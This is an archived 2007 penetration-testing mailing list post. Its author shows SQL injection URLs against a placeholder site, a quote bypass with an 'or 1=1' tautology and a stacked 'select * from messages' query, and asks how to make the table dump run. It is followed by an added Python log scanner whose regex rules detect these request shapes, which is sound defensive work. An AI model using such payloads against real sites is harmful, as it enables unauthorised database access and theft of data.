Penetration Testing mailing list archives
Re: SQL Injection- Bypassing magic_quotes
From: Danux <danuxx () gmail com>
Date: Tue, 9 Oct 2007 19:24:45 -0500
Hi,

Well, after taking some examples from you (thanks in advance), I am able to bypass single quotes, so I can inject something as simple as:

http://www.site.com/mod.php?id=1%27%20or%201=1--

But now, when trying to print a full table with the following injection:

http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;--

there is a warning saying that the connection is busy:

Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC SQL Server Driver]Connection is busy with results for another hstmt, SQL state S1000 in SQLExecDirect in .........mod.php

So, I think I need a way to execute the second query (mine) before the one that mod.php executes by itself (mod.php?id=1).

What do you think?
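For defenders reviewing web server logs, the two request shapes quoted in the message above can be flagged with a few heuristics. This is an added example, not part of the original post: the rule set, the `NUMERIC_PARAMS` assumption that `id` should be an integer, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Heuristic rules chosen for this example; not a complete signature set.
RULES = {
    "quote_in_value": re.compile(r"'"),
    "boolean_tautology": re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I),
    "comment_terminator": re.compile(r"--|/\*"),
    "stacked_statement": re.compile(
        r";\s*(select|insert|update|delete|drop|exec)\b", re.I),
}
NUMERIC_PARAMS = {"id"}  # assumption: the application expects an integer here
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(line):
    """Return the sorted rule names matched by one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = set()
    # Split on '&' only: a ';' inside a value must stay visible to the rules.
    for pair in urlsplit(m.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %27, %20, '+' before matching
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            hits.add("non_numeric_id")
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Return (line_number, matched_rules) for every suspicious line."""
    results = ((n, inspect_request(l)) for n, l in enumerate(lines, 1))
    return [(n, hits) for n, hits in results if hits]

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2007:19:20:01 -0500] '
    '"GET /mod.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Oct/2007:19:21:13 -0500] '
    '"GET /mod.php?id=1%27%20or%201=1-- HTTP/1.1" 200 9034',
    '192.0.2.10 - - [09/Oct/2007:19:24:45 -0500] '
    '"GET /mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;-- '
    'HTTP/1.1" 200 311',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The `non_numeric_id` rule is the most robust of the five, since it checks what the application expects instead of what an attack looks like; the same integer check applied in the application, together with parameterized queries, removes the injection point entirely.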